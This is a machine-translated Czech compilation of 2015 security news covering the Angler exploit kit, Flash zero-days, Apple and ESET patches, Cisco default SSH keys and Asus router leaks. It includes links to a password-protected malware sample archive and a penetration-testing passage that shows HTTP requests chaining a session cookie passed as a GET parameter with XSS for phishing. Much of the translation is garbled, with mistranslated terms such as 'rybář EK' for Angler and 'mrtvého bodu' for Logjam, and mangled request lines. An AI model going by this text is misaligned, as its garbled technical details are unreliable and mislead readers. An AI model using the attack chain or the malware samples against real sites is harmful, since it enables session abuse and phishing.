V současné době je většina EKS využít Flash player využije na základě naposledy známých zranitelností. Ale tato situace nemůže trvat věčně. Pokud Flash již není relevantní, co se kategorie EK autoři obrátit s žádostí o jejich nejnovější využije? Budou se vrátit k Javě? Budou se zaměřují na zranitelnosti prohlížeče? Bude zajímavé sledovat, kde se věci mají v příštím roce nebo tak nějak.

Pcap z 2015-07-15 rybář EK infekce provoz je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/07/15/2015-07-15-Angler-EK-traffic-for-ISC-diary.pcap
Zip soubor přidružené malware je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/07/15/2015-07-15-Angler-EK-and-CryptoWall-3.0-malware-for-ISC-diary.zip
Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

---
Brad Duncan
ISC Handler a bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] https://krebsonsecurity.com/2015/07/adobe-to-patch-hacking-teams-flash-zero-day/
[2] http://www.pcworld.com/article/2947312/second-flash-player-zeroday-exploit-found-in-hacking-teams-data.html
[3] http://krebsonsecurity.com/2015/02/yet-another-flash-patch-fixes-zero-day-flaw/
[4] http://arstechnica.co.uk/information-technology/2015/06/google-chrome-will-soon-intelligently-block-auto-playing-flash-ads/
[5] http://arstechnica.com/security/2015/07/firefox-blacklists-flash-player-due-to-unpatched-0-day-vulnerabilities/
[6] https://twitter.com/alexstamos/status/620306643360706561
[7] http://malware-traffic-analysis.net/2013/06/18/index.html
[8] http://www.symantec.com/connect/blogs/six-months-after-blackhole-passing-exploit-kit-torch
[9] http://malware-traffic-analysis.net/2014/09/16/index2.html
[10] http://malware-traffic-analysis.net/2014/08/30/index.html
[11] http://malware-traffic-analysis.net/2014/09/08/index2.html
[12] http://malware-traffic-analysis.net/2014/08/15/index.html
[13] http://malware-traffic-analysis.net/2014/09/25/index.html
[14] http://malware-traffic-analysis.net/2014/09/06/index.html
[15] http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html
[16] https://isc.sans.edu/forums/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863/

Flash Player dostal záplatu kritické chyby, kterou zneužíval Hacking Team

15.7.2015 Zranitelnost
Už na konci minulého týdne se ukázalo, že italská společnosti Hacking Team používala kritickou trhlinu ve Flash Playeru, který slouží k přehrávání videí na internetu. Ten používají po celém světě desítky miliónů lidí. Záplata tehdy chyběla. Společnost Adobe, která za zmiňovaným programem stojí, vydala záplatu až v noci z úterý na středu.
Před nebezpečnou trhlinou varoval Národní bezpečnostní tým CSIRT.CZ, jak Novinky informovaly minulý týden v pátek. [celá zpráva]

„Únik dat ze společnosti Hacking Team odhalil existenci zranitelnosti ve Flash Playeru. Zranitelnost se bohužel týká všech hlavních prohlížečů,“ uvedl již dříve Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Chybu mohou počítačoví piráti zneužít k propašování libovolného škodlivého kódu do cizích počítačů. Zamezit jim v tom má právě uvolněná aktualizace. Stahovat ji je možné přímo ze stránek společnosti Adobe, případně prostřednictvím automatických aktualizací doplňků přímo v prohlížeči.

Špionážní software = miliónový byznys
Kauza okolo uniklé databáze Hacking Teamu ukazuje, jak tenká je hranice mezi počítačovými bezpečnostními experty a plnokrevnými hackery. I když by se mohlo na první pohled zdát, že zmiňovaná italská společnost má blíže k tomu druhému, ve skutečnosti zaměstnanci Hacking Teamu pracovali na obou stranách barikády. Milióny si tak nechali vyplácet dvakrát.

Z uniklé databáze, která obsahuje stovky gigabajtů dat a která koluje od minulého týdne internetem, totiž vyplývá, že nezanedbatelnou část příjmů společnosti Hacking Team tvoří ty z auditorské činnosti. Kromě vývoje šmírovacích programů, které zneužívaly podobných chyb, jako byla ta ve Flash Playeru, totiž italský podnik hodnotil a prověřoval zabezpečení webových stránek i interních systémů firem prakticky ze všech koutů světa.

Detailní plány zabezpečení tak dostali tito bezpečnostní experti naservírované doslova na dlani. Se všemi těmito znalostmi pak pro ně bylo velmi snadné vytvářet tzv. exploity, tedy speciální programy umožňující získat přístup na nejrůznější weby či služby za účelem napadení zmiňovaných subjektů.

Firefox začal natvrdo blokovat Flash, vyčítá Adobe bezpečnostní díry

15.7.2015 Zranitelnosti

Flash se ocitl na seznamu blokovaných zásuvných modulů, uživatel si jej ale může znovu povolit. Opatření je podle Mozilly dočasné.

Znamená to, že ve Firefoxu je teď Flash standardně zablokovaný a pokud jej chce uživatel používat, musí si jej sám v nastavení povolit. V praxi to vypadá tak, že se při příchodu na web např. s flashovým bannerem zobrazí upozornění, že prohlížeč „zabránil spuštění neaktuálního zásuvného modulu“ a uživatel dostane možnost buď v blokování pokračovat, nebo je zrušit.

Podle Schmidta je opatření dočasné: „Aby bylo jasno, Flash budeme blokovat jen do doby, než Adobe uvede verzi, která není zneužitelná veřejně známými bezpečnostními chybami,“ dodal v dalším tweetu. A přidal příslib do budoucna: „Prozatím :)“

Flash je momentálně pod palbou kvůli kritickým zranitelnostem, které zveřejnili hackeři v materiálech uniklých z firmy Hacking Team. A objevují se další a další problémy.

Ústup webových firem od flashové technologie je ale znát už delší dobu – YouTube už jej například nabízí jen jako alternativu k výchozímu HTML5 videopřehrávači. A v neděli na Twitteru Adobe k ukončení vývoje Flashe otevřeně vyzval bezpečnostní šéf Facebooku Alex Stamos.

Apple "Patch Tuesday"

1.7.2015 Zranitelnosti
Včera Apple uvolnil záplaty pro OS X, iOS, Safari, Mac EFI, iTunes a Quicktime (Windows) [1]. Zde některé z vrcholů:

EFI aktualizace
"EFI" je firmware spuštěním Mac. Tato aktualizace bude platit pouze u některých modelů počítačů Apple. Dvě chyby, které jsou opravené tímto updata:

CVE-2015-3692: Tato problematika by mohla umožnit útočníkovi změnit EFI firmware, získání trvalé přístup do systému. Chyba byla zveřejněna asi před dvěma měsíci a základní otázkou bylo, že firmware není řádně uzamčen jako systém vrátí z režimu spánku [2].

CVE-2015-3693: Výzkumníci společnosti Intel a Carnegie Mellon University původně objevil tento problém, av březnu, projekt Google nula zveřejnil podrobnosti o pracovní využít pro "rowhammer" zranitelnost [3] [4]. Tento problém není specifický pro Apple, ale účinky mnoho systémů využívajících moderní DRAM paměti. Stručně řečeno, opakovaně písemně některých oblastech paměti, sousední řady paměti může být prováděna umožňující útočníkovi manipulovat kód, že by neměl přístup k jinak.

OS X aktualizace
Tato aktualizace se týká verzí OS X Mountain Lion zpět na (10,8). Celkem 46 otázek, jsou adresy (a ještě více individuální zranitelnosti). Takže tady jen některé zdůrazňuje:

Open Source Software: OS X obsahuje mnoho standardních softwarové produkty open source, jako Apache a knihoven, jako je OpenSSL. Tyto open source produkty jsou aktualizace.

SSL: řada změn byly provedeny na SSL. Například některé meziprodukty certifikáty problémy podle CNNIC již nejsou důvěryhodné. Zajímavé je, CNNIC CA sám ještě zdá být důvěryhodný (jiní, jako je Google, odstraní CNNIC úplně). Apple neposkytuje seznam nových certifikátů přidaných, ale pouze odkazuje na jeho kompletní seznam důvěryhodných certifikátů [5]. I nadále můžete manuálně "nedůvěra" certifikát úpravou důvěru v Keychain Access. V reakci na mrtvého bodu zranitelnosti, parametry Diffie-Hellman jsou nyní omezena na 768 bitů nebo větší (před tím, 512 bit bylo možné). To je v souladu s tím, co jiné operační systémy zavedly v reakci. Tam je malá šance, že to bude způsobovat problémy s připojením do starších serverů.

EFI Související: řešit problémy v této aktualizaci EFI, jsou také zabývá tím, aktualizace OS X..

Mail: e-mailové zprávy byl schopen načíst webové stránky, které pak by mohly být použity na různé útoky typu phishing, například tím, že zobrazuje dialogové okno, pop-up hesla, která vypadá, že přijde ze Mail.app. Tento problém byl již zveřejněn začátkem června [6]

iOS
Vzhledem k celkovému podobné kódové základny mezi iOS a OS X, mnohé z otázek, na OS X platí pro iOS stejně. Například otázky TLS, stejně jako otázka Mail vliv na iOS a jsou záplatované s touto aktualizací. Na zajímavé téma, které jsem neslyšel o dříve (ale ne překvapivé). Škodlivé SIM karty může vést ke spuštění kódu.

Safari
Jako obvykle, Safari je k dispozici, protože vlastní aktualizace. Pouze 4 různé otázky zde od otázek příčných původu ke vzdálenému spuštění kódu.

iTunes / QuickTime
Tyto aktualizace ovlivňují systém Windows (verze OS X je vrácena do OS X náplasti). Neexistuje žádný oficiální QuickTime verze pro Windows než Windows 7. Ale pokud používáte verzi systému Windows 7 na Windows 8 / 8.1, bude pravděpodobně nadále třeba aktualizovat.

[1] https://support.apple.com/en-us/HT201222
[2]
http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
[4] http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain .html
[5] https://support.apple.com/en-us/HT202858
[6] https://github.com/jansoucek/iOS-Mail.app-inject-kit/tree/master

APPLE PATCHES DESÍTKY CHYBY V IOS 8.4, OS X 10.10.4

1.7.2015 Zranitelnosti

Apple vydal nové verze iOS a OS X, z nichž oba obsahují značné množství bezpečnostních záplat, několik chyb, které mohou vést ke vzdálenému spuštění kódu a dalších závažných otázkách. Verze 8.4 iOS obsahuje opravy pro více než 30 bezpečnostních chyb, včetně chyb v jádře WebKit, iOS, a CoreText. Apple také oprava zranitelnost, která vede k útoku mrtvého bodu , problém s servery, které podporují slabý Diffie-Hellman šifrování. Chcete-li opravit tento problém v systému iOS, Apple vydala opravu pro součást coreTLS operačního systému. "CoreTLS přijal krátkých prchavé Diffie-Hellman (DH) klíče, jak je používán v export-pevnostních efemérní CZT kódové soupravy. Tato otázka, také známý jako logjam, nechá útočníka s výsadní postavení sítě downgrade zabezpečení 512-bit DH případě, že server podporován export-sílu efemérní DH šifrovací sada. Problém byl řešen zvýšením výchozí minimální povolenou velikost pro DH jepičí klíče 768 bitů, "Apple poradní říká. Apple také oprava zajímavou chybu, která zahrnovala způsob, jakým iOS zpracovává náklad ze SIM karet. Tato chyba zabezpečení by mohla útočníkovi umožnit vytvořit nebezpečný SIM kartu, která mu mohla dát spuštění kódu na cílové zařízení. Mezi další zranitelná místa oslovených v iOS 8,4ar řada WebKit chyb, z nichž některé by mohly vést ke spuštění kódu. Poprava kód chyby patří dvojici korupce paměť zranitelností v WebKit, a problém s tím, jak rámec manipulováno některé funkce SQL. "Nedostatečná srovnání problém existuje v SQLite authorizer která umožnila vyvolání libovolných SQL funkcí. Tento problém byl vyřešen s lepšími kontrolami autorizace, "říká poradní Apple. Tam je náplast v nové verzi iOS na chyby, které by mohly vést k útočníkovi být schopný nahradit legitimní aplikace s nebezpečným jedna za určitých podmínek. Zranitelnost je ve způsobu, jakým operační systém zpracovává univerzální profily opravných položek, a mohou být použity k nahrazení systémových aplikací, jako je například Apple zaplatit. Výzkumníci z FireEye objevil zranitelnost a hlášeny ho Apple téměř před rokem. "Manifest Masque útok využívá CVE-2015-3722 / 3725 zranitelnost zbourat existující aplikace na iOS, kdy oběť instaluje aplikaci in-house iOS bezdrátově pomocí Enterprise provisioning z webové stránky. Zbořen app (cílová útok) může být buď pravidelné aplikace stáhnout z oficiálních App Store nebo dokonce důležitých systémových aplikací, jako je například Apple Watch, Apple Pay, App Store, Safari, Nastavení, atd Tato chyba zabezpečení ovlivňuje všechny iOS 7. x a iOS 8.x verze předcházející iOS 8.4. Poprvé jsme upozorněni Apple této chyby zabezpečení v srpnu 2014 "vědci FireEye je napsal v vysvětlení o chyby a jeho důsledky. Stejně jako pro OS X, Apple záplatovaný mnoho stejných chyb, které byly přítomny v iOS, spolu s desítkami dalších, celkem více než 75 chyb ve všech. OS X 10.10.4 obsahuje záplaty pro několik buffer overflow zranitelností v Intel grafický ovladač, z nichž některé by mohly vést ke spuštění kódu. Apple opraveny také řadu korupčních paměť chyb v QuickTime, které by mohly být použity pro spuštění kódu. V obou iOS a OS X Apple aktualizoval důvěryhodnosti politiky certifikátu řešit problém certifikátu CNNIC , mimo jiné problémy.

See more at: Apple Patches Dozens of Flaws in iOS 8.4, OS X 10.10.4 https://wp.me/p3AjUX-txp

Adobe opravuje zero-day chybu ve webovém pluginu Flash Player

29.6.2015 Zranitelnosti

Výzkumníci z FireEye analyzovali útoky hackerské skupiny APT3 na společnosti působící v telekomunikačním, leteckém i obranném průmyslu. Odhalili tak kritickou zranitelnost ve Flash Playeru (CVE-2015-3113), která byla při těchto útocích využívána. Útočníkům dobře posloužila při průniku do systémů Windows 7 a starších, na kterých byl používán Internet Explorer a také u obětí používajících Firefox na systému Windows XP.

Podle blogu FireEye obdrželi oběti email s odkazem na útočný web. Pokud na něj vstoupili, došlo ke spuštění kódu v JavaScriptu, který sloužil k profilování oběti. Pokud byla oběť rozpoznána jako zajímavá, došlo ke stažení škodlivých SWF a FLV souborů, které sloužily k nasazení backdooru známého pod názvem SHOTPUT.

Jak to přesně fungovalo? Exploit zneužil zranitelnost ve Flashi k obejití obrané techniky ASLR (Address Space Layout Randomization) a pomocí return-oriented-programing překonal i DEP (Data Execution Prevention). Shellkód byl zabalen v souboru pro Adobe Flash Player spolu s klíčem pro jeho dešifrování. Jeho úkolem bylo najít samotná data, která měl nasadit na počítač oběti. Ta byla zaxorovaná a skrytá v obrázku.

Záplata již byla vydána, takže doporučujeme co nejdříve aktualizovat Adobe Flash Player na verzi 18.0.0.194.

Zranitelnost v antiviru ESET

29.6.2015 Zranitelnosti

Většina antivirových řešení obsahuje nástroj pro emulaci, který se používá pro testování spustitelného kódu při hledání virů. Ke spuštění emulace v antivirovém programu dochází automaticky v podstatě na každém kroku uživatele - když surfuje po internetu, obdrží email, stahuje sdílené soubory, připojí USB zařízení a v mnoha dalších případech. A při emulaci pracuje antivirus se zcela neznámými a nedůvěryhodnými daty. Proto by emulátor měl být robustní a izolovaný nástroj.

Jak ale ukázal článek na blogu Google Project Zero, u antivirových produktů společnosti ESET tomu tak není. Útočník dokáže emulátor jednoduše obejít a spustit v průběhu skenování libovolný kód a to se systémovým oprávněním. Následně si tedy může dělat prakticky cokoli - číst, upravovat a mazat všechny soubory na disku, přistupovat k hardwaru jako je mikrofon a webkamera, sledovat veškerou internetovou komunikaci či zaznamenávat stisknuté klávesy.

Uživatel navštívil škodlivou stránku, zatímco měl nainstalovaný ESET NOD32, čímž dal útočníkovi možnost spustit jako root libovolné příkazy.

Problém se nachází ve všech produktech ESET (namátkou Smart Security, NOD32…) a to ve verzích pro všechny platformy, tedy Windows, Mac i Linux. Problém nezáleží na nějakém konkrétním nastavení, chyba je zneužitelná i v defaultním nastavení programů.

ESET na problém okamžitě zareagoval a zranitelnost opravil. Pohlídejte si tedy, abyste měli nainstalovanou aktualizaci, kterou vydali 22. června.

Web bezpečnostní jemnosti a využívání kombinovaných zranitelnosti

29.6.2015 Zranitelnosti
Cílem testu penetrační je hlásit veškeré zjištěné zranitelnosti k zákazníkovi. Samozřejmě, každý penetrace Tester staví většinu svého úsilí na nalezení kritické bezpečnostní chyby: SQL injection, XSS a podobné, které mají největší vliv na testované webové aplikace (a, opravdu, to nebolí penetraci testeru ego, když takový zranitelnost je identifikována :)

Nicméně, já silně tlačit směrem k vykazování každého jednotlivého zranitelnosti, bez ohledu na to, jak by se mohlo zdát neškodná (a moji spolupracovníci penetrace tým někdy stěžují na to, ale pojďme ukázat jim špatně).

Zde se podíváme na to, jak může být dvě zdánlivě nízké rizikových zranitelností sloučeny do více nebezpečný.

Přijímání parametry GET a POST žádosti

Při zpracování parametry / odpovědi přijaté od klienta, většina z dnešních webových aplikací spoléhají na požadavky HTTP POST. To je preferovaný způsob posílání klienta souvisejících s vstup / výstup z prohlížeče, protože to nebude viditelný v (nebo proxy je) logů webového serveru. Jedním z testů jsem normálně udělat, je zkontrolovat, zda aplikace akceptuje stejné parametry v GET HTTP požadavků. Pojďme se podívat na to.

"Oficiální" Požadavek vypadá takto:

POST / stránku HTTP / 1.1
Host: my.example.local
... (další hlavičky)

parametr = hodnota & tajemství = secret_value

Nyní se můžeme pokusit vydat stejnou žádost jako všeobecní žádost GET HTTP:

? GET / strana parametr = hodnota & tajemství = secret_value HTTP / 1.1
Host: my.example.local
... (další hlavičky)

Pokud to fungovalo to znamená, že testovaný webová aplikace (testováno stránky / script) přijímá parametry z jakékoliv přání. I když toto samo o sobě není opravdu chyba zabezpečení, není to perfektní způsob, jak pro příjem a zpracování parametrů, jak uvidíme dále. Navíc, mějte na paměti, že toto dělá práci útočníka trochu jednodušší - místo práce s žádostí HTTP POST se může jednoduše dát vše do GET HTTP požadavku (jo, to funguje u obránců, jak dobře, protože uvidíme, co se dal do požadavek).

Zdánlivě neškodné XSS zranitelnost

Zatímco další testování této aplikace jsme našli XSS zranitelnost. Pro jednoduchost řekněme, že je to anonymní aplikace, která nemá žádné přihlašovací formuláře. Nicméně, protože aplikace, závisí na určitém pracovním postupu, a od té doby bylo zjištěno, XSS ve 3. kroku pracovního postupu, to vyžaduje platný cookie (JSESSIONID cookie).

Co to znamená? To znamená, že útočník nemůže využít XSS zranitelnost: v případě, že požadavek na zranitelné stránky je vyroben bez platného JSESSIONID cookie, aplikace jednoduše přesměruje uživatele na přední straně (první krok workflow). I v případě, že oběť nyní znovu klikli na odkaz škodlivý, to ještě nebude fungovat, protože testované aplikace kontroluje pracovního postupu fáze / krok, a pokud to není zase opravit pouze přesměruje uživatele na přední straně.

Ach, jako zklamání po zjištění velmi pěkný XSS zranitelnost: útočník může skutečně využívat pouze sám sebe, a to je to vůbec žádná legrace. Nebo je tam jiný způsob?

Vezmeme to kousek dál

Vzpomeňte si, jak jsme přišli na to, že žádost přijímá parametry jak GET a žádosti POST HTTP výše?
Uvidíme, co jiného může být podána prostřednictvím těchto žádostí. Cookie, který má zásadní význam pro chování testované aplikace je jednoduchý JSESSIONID cookie, který vypadá takto:

Cookie: JSESSIONID = 560308266F93351159D8D20732C637FA

Vzhledem k tomu, cookie se běžně posílá jako součást hlavičky, může útočník nedostane prohlížeč oběti nastavit cookie pro cílovou webovou aplikaci, alespoň ne bez využití další chyby - jako je XSS zranitelnost - ale nezapomeňte, že nemůžeme využít ji bez platné cookie. Catch 22 není to?

Ale, ať to není ztrácet naději. Co když se snažíme podat cookie jako parametr GET nebo požadavku POST HTTP? Taková žádost by vypadat takto:

GET / stránku JSESSIONID = 560308266F93351159D8D20732C637FA¶meter = hodnota & tajemství = secret_value HTTP / 1.1?
Host: my.example.local
... (další hlavičky)

Bingo! To fungovalo - testovaný webová aplikace šťastně vzali a analyzovat všechny předložené parametry, dokonce i parametr JSESSIONID která by měla být za normálních okolností dodáván jako cookie. Vývojáři pravděpodobně chtěl být tak flexibilní, jak je to možné.

Kombinací zranitelnosti do exploit

Takže, útočník může nyní nasadit následující útok:

Vytvoření nové relace, kde se přejde na požadovanou obrazovku. Aplikace nyní "ví", že cookie JSESSIONID, která byla dána k útočníkovi vztahuje k relaci, která je na zranitelné obrazovku.
Vytvořit škodlivý adresu URL, která zneužívá XSS zranitelnost. Připojit parametr JSESSIONID, který obsahuje cookie hodnotu útočníka do škodlivého URL. Tato adresa URL bude fungovat, protože zranitelné webová aplikace bude ověřovat stav relace a uvidíte, že uživatel je přístup k platné obrazovku v pracovním postupu.
Pošlete škodlivý URL k oběti, počkejte a zisk.
Konečně, poslední věc k diskusi, je možná to, co jsme využít s zranitelnosti XSS na prvním místě: typicky útočník pokusí se ukrást cookie s cílem získat přístup k relaci oběti. Vzhledem k tomu, zde sezení jsou irelevantní, se útočník nepoužívá XSS ukrást cookies, ale místo toho změnit to, co se zobrazí stránka webové oběti. Toho lze využít pro všechny druhy phishing činy a, v závislosti na URL a kontextu útoku, může být ještě ničivější než krást zasedání.

Výchozí pověření Cisco - znovu!

29.6.2015 Zranitelnosti
Cisco dnes vydala informační zpravodaj zabezpečení oznamující, že některé z produktů společnosti Cisco IronPort "Virtual Appliance" obsahovat "více výchozí SSH klíčů". Chcete-li citovat: Chyba zabezpečení v funkčnosti vzdálené podpory Cisco WSAv, Cisco ESAv, a Cisco SMAv softwaru by mohla umožnit neověřenému vzdálenému útočníkovi připojit do postiženého systému s právy uživatele root.

Oh, dobrá věc, je to jen "root". Měl jsi mě strach, že na druhou :). Zajímavé je, že byl poněkud podobný Cisco poradní před rokem (na CUCDM), kde byl také přítomen výchozí SSH klíč, a stejně tak vedl k oprávnění uživatele root. Vyhledávání "výchozí pověření" na poradním webových stránkách společnosti Cisco ukazuje, že za posledních několik let, přítomnost backdoor a výchozí uživatele nadále opakující se problém:

Chcete-li úvěr Cisco, zdá se, že našel dnešní SSH klíčový problém sami o sobě, před tím, než byl zneužit, takže možná je to znamení lepších časů přijít, a důkazy o tom, že po všech těch letech, někdo na Cisco má vlastně začal systematicky auditovat celý svůj kód základny na přítomnost výchozích pověření. Nebo to možná bylo jen štěstí najít, a "hvězdný" 10 roků traťový rekord z výchozích bezpečnostních pověření bulletiny bude pokračovat na další desetiletí? Čas ukáže ...

Je Windows XP stále kolem ve vaší síti rok po Support Ukončeno?

29.6.2015 Zranitelnosti
Tento týden Computerworld [ 1 ] zveřejnila příběh o americkém námořnictvu stále platí miliony Microsoft podporovat Windows XP, když podpora skončila 08.4.2014 [ 2 ], a brzy se systémem Windows Server 2003 budou následovat příští měsíc 14.července 2015.

Pokud platíte společnosti Microsoft i nadále používat zastaralé systémy, jako WinXP, to je zřejmé, že budete muset zaplatit podporu, aby se opravy a pokračovat v ochraně vy sítě proti zranitelnosti, které jsou již veřejně uvolňují na obranu proti potenciálním ohrožení. To přináší cyklus modernizace vlastních aplikací používaných k podpoře kritického systému, které byly napsané na starší platformě a měly by byly součástí programu modernizace, testovací a modernizaci včas, aby zachránit milionů na podporu, které si myslím, že nakonec by měl šetřit peníze. Jako příklad, je námořnictvo platí "[...] smlouvu, která by mohla být v hodnotě až 30.800.000 dolarů, a rozšířit do roku 2017." [ 1 ]

Jste stále podporuje WinXP, protože starší aplikace a je zde plán na jejich migraci přes Win7 / Win8? Pokud ne, jak se chránit tyto klienty proti vykořisťování?

[1]
https://www.microsoft.com/en-in/windows/enterprise/end-of-support.aspx

Antivirové programy otevíraly útočníkům zadní vrátka do PC

29.6.2015 Zranitelnosti
Snad každý uživatel počítače ví, že antivirové programy jsou první obrannou linií před nejrůznějšími viry a dalšími nezvanými návštěvníky. Jenže i tito ochránci mohou stejně jako každý jiný software obsahovat chyby. Minulý týden byla jedna taková objevena v antivirových programech společnosti ESET, útočníkům otevíraly zadní vrátka do PC.
Chyba umožňuje vzdálenému útočníkovi číst, měnit nebo mazat všechny soubory v systému.
Před chybou v softwarových nástrojích společnosti ESET varovalo Národní centrum kybernetické bezpečnosti. „Tato chyba umožňuje vzdálenému útočníkovi číst, měnit nebo mazat všechny soubory v systému bez ohledu na přístupová práva,“ uvedli zástupci centra.

„Dále umožňuje instalovat jakékoliv programy, přistupovat k hardwaru, jako je například webkamera, mikrofon nebo skener a zaznamenávat jakoukoliv systémovou aktivitu včetně stisku kláves či síťového provozu,“ konstatovali bezpečnostní experti.

Trhlina byla odhalena v aplikacích Smart Security, NOD32 Antivirus, ale například také v utilitě Cyber Security. Tyto nástroje byly zneužitelné i v případě, že uživatel nijak neměnil jejich nastavení a nechal je v defaultním režimu.

Pro všechny dotčené aplikace, ve kterých byla chyba objevena, již společnost ESET vydala minulý týden aktualizaci. S její instalací by tak uživatelé neměli otálet.

Postižené systémy
ESET Smart Security pro OS Windows
ESET NOD32 Antivirus pro OS Windows
ESET Cyber Security Pro pro OS X
ESET NOD32 pro Linux Desktop
ESET Endpoint Security pro OS Windows and OS X
ESET NOD32 Business Edition
Zdroj: Národní centrum kybernetické bezpečnosti

Pozor na routery Asus. CZ.NIC v nich našel chybu, která „otevře dveře“

26.6.2015 Zranitelnsti

Před měsícem zveřejnili autoři projektu Turris zprávu o tom, že se jim díky novým sledovacím funkcím podařilo odhalit aktivní botnet využívající routery. Pokračovali ve sledování a připravili také návnadu, která odhalila závažnou bezpečnostní chybu v domácím routeru od Asusu. Informace autoři zveřejnili na blogu CZ.NIC.

Před měsícem bylo sledování ještě na začátku a bezpečnostní experti z CZ.NIC napočítali zatím jen necelé dvě stovky IP adres napadených routerů. Nyní už jich je 13 tisíc. Je překvapivé, že 70% z nich jsou routery značky Asus. A tak v CZ.NIC jeden takový router zakoupili a pustili se do zkoumání, v čem by mohl být problém.

590415613
Pokusným routerem se stal Asus RT-N10U hardwarové revize B1. Levný domácí router, který je jedním z nejčastější zjištěných prvků botnetu. Bylo u něj zkontrolováno, zda má poslední verzi firmwaru, nastaveno silné heslo do administrace a nebyl aktivovaný firewall. Zkrátka běžné provozní podmínky. Takto připravený router byl „vystaven na internet“ a skrze Turris byl zaznamenáván síťový provoz.

Dva týdny probíhaly běžné útoky s nejčastějšími kombinacemi hesel, ale ty byly pochopitelně neúspěšné. Jaké pak ale přišlo překvapení, když se kdosi s bulharskou IP adresou do routeru přihlásil se správným heslem. Přitom předtím nebyly zaznamenány žádné pokusy o násilné hádání hesla, které přitom bylo značně unikátní. Bližší zkoumání odhalilo, že heslo předtím router odeslal v nezašifrované podobě, bylo součástí javascriptového kódu hlášky odezvy na chybnou stránku.

Jak bylo dále zjištěno, tato velká bezpečnostní chyba byla diskutována už v únoru 2014 a Asus pro ni připravil aktualizace firmwarů. Ale zřejmě jen u některých modelů. V testovaném modelu RT-N10U vestavěný nástroj pro kontrolu aktualizací hlásil, že novější neexistuje, ovšem novější firmware i pro tento model kupodivu existuje. Jen ho musíte vyhledat a stáhnout ručně.

Pokud používáte nějaký router od Asusu, preventivně si ověřte, zda máte poslední firmware a případně jej aktualizujte. Přitom router zresetujte a změňte mu heslo. Nutno ale připomenout, že v botnetu byly zjištěny i další routery a podobných bezpečnostních děr bude existovat více. Jsou to otevřená vrata do soukromí nic netušících uživatelů. Podrobnosti najdete na blogu CZ.NIC.

Flash Player 0-day využívány ve volné přírodě, náplast ihned!
24.6.2015 Zranitelnosti
Společnost Adobe vydala nouzovou opravu pro své notoricky buggy software Flash Player, protože útočníci jsou aktivně využívají kritické zranitelnosti, které může vést k celkovému systému kompromisu. "Adobe si je vědom zpráv, které CVE-2015-3113 je aktivně využívaných v divočině přes omezený , cílené útoky. Systems spuštěna aplikace Internet Explorer pro Windows 7 a níže, stejně jako Firefox v systému Windows XP, jsou známé cíle, "společnost sdílené v bulletinu zabezpečení zveřejněné v úterý. zranitelnost byla hlášena Adobe výzkumníky FireEye, kdo všiml je využívána v červnu v phishing kampani. E-maily zahrnuty odkazy na napadených webových serverů, které sloužily buď benigní obsah nebo škodlivý soubor Adobe Flash Player, který zneužívá chybu. (velmi obecný) phishingu kampaň zjevně zaměřena na organizace v letectví a obrany, stavebnictví a strojírenství, high-tech, telekomunikační a dopravním průmyslu. "útok zneužívá unpatched chyba zabezpečení ve způsobu, jakým Adobe Flash Player analyzuje soubory flash video (FLV). exploit využívá společný vektorových techniky korupce, aby se vyhnula Address Space Layout R (ASLR), a používá Return-orientované programování (ROP), aby se vyhnula Data Execution Prevention (DEP). pěkný trik, aby jejich ROP technikou dělá to jednodušší využít a bude vyhnout se některé detekční ROP techniky, "výzkumníci FireEye vysvětloval . "Shell kód je uložen v balené Adobe Flash Player využívat souboru spolu klíč používaný k jeho dešifrování. Užitečné zatížení je XOR zakódovány a skrytý uvnitř obrazu. " Vědci se domnívají, že skupina hrozeb oni říkali APT3 (aka UPS) je za útokem. Považováno za velmi sofistikované, tato skupina prohlížeč založený na zero-day využije několikrát předtím. Jsou to obvykle po pověření, a usilují o dosažení přetrvávání v síti cílových organizací instalací vlastní zadní vrátka na mnoho hostitelů v něm. Windows, OS X a uživatelé Linuxu se doporučuje, aby aktualizovali své produktové instalace na nejnovější verzi. Můžete zkontrolovat, kterou verzi používáte podle vising této stránky . Adobe Flash Player nainstalován s Google Chrome a Internet Explorer v systému Windows 8.x bude automaticky aktualizovat na nejnovější verzi.

Zprávy HP zneužitelného kódu pro IE zero-day, že Microsoft nebude oprava
24.6.2015 Zranitelnosti
Navzdory tomu, že zaplatil 125.000 dolar informace o adresní prostor rozložení randomizace (ASLR) zranitelnosti ovlivňuje Internet Explorer, Microsoft se rozhodl proti záplatování, protože se domnívají, že nemá vliv na výchozí konfiguraci IE. Ale výzkumníci z iniciativy HP Zero Day, kteří objevili to zero-day chyba v první řadě věří, že "se týkaly uživatelé by měli být jako plně informován, jak je to možné, aby se bez ohledu na opatření, zjistí, vhodné pro jejich vlastní zařízení." To je důvod, proč publikoval důkaz-of-concept (PoC) kód demonstrovat tento obchvat na Windows 7 a Windows 8.1, a podrobnosti o výzkumu a technické podrobnosti útoků, spolu s tipy, jak zlepšit obranu prohlížeče.

"Uvolnění tuto úroveň detailů o Nepřipevněné chyba není něco, co bychom normálně dělat, ani budeme dělat to na lehkou váhu. Chcete-li být velmi jasné, neděláme to ze zášti či zlomyslnosti," HP Dustin Childs vysvětlil . "Nicméně, protože Microsoft potvrzuje, že se v korespondenci s námi nemají v úmyslu přijmout opatření z tohoto výzkumu, jsme cítili potřebu poskytovat tyto informace veřejnosti. Činíme tak v souladu s podmínkami naší vlastní ZDI programu zranitelnost utajení. " Dodal také, že toto není první prodejce se rozhodla, že nebude opravit problém si myslí, že by měli, a to jistě nebude naposledy. Bohužel, vydala informace, je pravděpodobné, že přijde vhod pro využívání Developers Kit.

OS X a iOS Neoprávněný Cross Aplikace Resource Access (XARA)

19.6.2015 Zranitelnosti
